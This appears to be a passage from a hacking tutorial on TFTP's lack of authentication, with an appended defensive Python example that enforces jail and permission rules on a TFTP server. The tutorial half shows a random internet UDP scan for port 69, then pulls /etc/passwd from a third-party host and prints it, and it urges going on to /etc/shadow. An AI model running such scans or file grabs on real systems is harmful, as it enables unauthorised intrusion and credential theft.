TFTP is your friend. TFTP does not require any authentication - it is
usually used for network equipment to get their configurations at boot time.
A router can be set up to TFTP to a Unix/Windows box and get its config from
this box. TFTP makes use of the UDP protocol - and is as such
connectionless.
Normally a TFTP server will allow the attacker to transfer any file to
him/her (/etc/shadow might be a start). More recent versions of the
server will restrict you to files that are readable by everyone,
and you might find yourself "jailed" in a directory - like with FTP. The
other restriction on the more recent servers is that the only files that can
be written are those that already exist and that are writable by everyone.
The other difference between TFTP and FTP is that you need to know which file
you want - there is no "ls" command, but then again, you can make some
intelligent choices.
Let us look at an example (this is really easy, but what the heck). First I
use nmap to find a machine out there with an open TFTP port. Note that for
this scan (a UDP scan) you'll need to allow UDP (duh) and ICMP to enter your
network, as nmap looks at ICMP port unreachable messages to determine if the
port is open.
# nmap -sU -iR -p 69
> tftp
tftp> connect 129.xxx.121.46
> get /etc/password /tmp/passwd
tftp> get /etc/passwd /tmp/passwd
Received 679 bytes in 1.9 seconds
tftp> q
/> more /tmp/passwd
root:*:0:0:System Administrator:/root:/usr/contrib/bin/bash
daemon:*:1:1:System Daemon:/:/sbin/nologin
sys:*:2:2:Operating System:/tmp:/sbin/nologin
bin:*:3:7:BSDI Software:/usr/bsdi:/sbin/nologin
operator:*:5:5:System Operator:/usr/opr:/sbin/nologin
uucp:*:6:6:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucico
games:*:7:13:Games Pseudo-user:/usr/games:/sbin/nologin
news:*:9:8:USENET News,,,:/var/news/etc:/sbin/nologin
demo:*:10:13:Demo User:/usr/demo:/sbin/nologin
www:*:51:84:WWW-server:/var/www:/sbin/nologin
nobody:*:32767:32766:Unprivileged user:/nonexistent:/sbin/nologin
nonroot:*:65534:32766:Non-root root user for NFS:/nonexistent:/sbin/nologin
Note - I transfer the /etc/passwd file to the temp directory. If you do the
TFTP as root, and you are not careful, you will overwrite your own
/etc/passwd file :). We have the password file - it is shadowed - but we can
now easily get any other file (the real password file etc.).
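The restrictions the newer servers apply (jailed to a directory, reads only of world-readable files, writes only to existing world-writable files) are what turns the /etc/passwd grab above into a refused request. This added example, not code from the original page or from any real tftpd, encodes and decodes the RRQ/WRQ packet that crosses UDP/69 and then applies those three rules; the file names, permission bits and jail directory are constructed for the demo.

```python
import os, stat, struct, tempfile
RRQ, WRQ = 1, 2  # RFC 1350 opcodes: read request, write request

def build_request(opcode, filename, mode="octet"):
    """Encode a request as it travels over UDP/69: opcode | filename | 0 | mode | 0."""
    return struct.pack("!H", opcode) + filename.encode() + b"\0" + mode.encode() + b"\0"

def parse_request(packet):
    """Decode an RRQ/WRQ; malformed packets are rejected before any filesystem access."""
    opcode = struct.unpack("!H", packet[:2])[0] if len(packet) >= 4 else 0
    if opcode not in (RRQ, WRQ):
        raise ValueError("not a TFTP read/write request")
    fields = packet[2:].split(b"\0")  # [filename, mode, "" or RFC 2347 options...]
    if len(fields) < 3 or not fields[0]:
        raise ValueError("unterminated or empty filename/mode")
    mode = fields[1].decode("ascii").lower()
    if mode not in ("netascii", "octet", "mail"):
        raise ValueError("unknown transfer mode")
    return opcode, fields[0].decode("ascii"), mode

def check_request(opcode, filename, root):
    """The newer-server policy: jail to root, RRQ only world-readable files,
    WRQ only files that already exist and are world-writable. Returns (ok, reason)."""
    root = os.path.realpath(root)
    # /etc/passwd is taken relative to the jail; realpath + commonpath stop ../ escapes
    target = os.path.realpath(os.path.join(root, filename.lstrip("/")))
    if os.path.commonpath([root, target]) != root:
        return False, "path escapes TFTP root"
    try:
        st = os.stat(target)
    except OSError:
        return False, "no such file"
    if not stat.S_ISREG(st.st_mode):
        return False, "not a regular file"
    if opcode == RRQ and not st.st_mode & stat.S_IROTH:
        return False, "not world-readable"
    if opcode == WRQ and not st.st_mode & stat.S_IWOTH:
        return False, "not world-writable"
    return True, "ok"

def demo():
    """Constructed jail with three files; returns the policy verdict per sample request."""
    root = tempfile.mkdtemp()
    for name, mode in (("router.cfg", 0o644), ("private.cfg", 0o600), ("upload.bin", 0o666)):
        open(os.path.join(root, name), "w").close()
        os.chmod(os.path.join(root, name), mode)
    samples = [(RRQ, "router.cfg"), (RRQ, "private.cfg"), (RRQ, "../../etc/passwd"),
               (WRQ, "upload.bin"), (WRQ, "new.bin"), (RRQ, "/etc/passwd")]
    return {(op, name): check_request(*parse_request(build_request(op, name))[:2], root)[1]
            for op, name in samples}
```

Each sample request is round-tripped through build_request and parse_request before the policy check, so the demo also shows that a client naming /etc/passwd on a jailed server simply asks for <root>/etc/passwd.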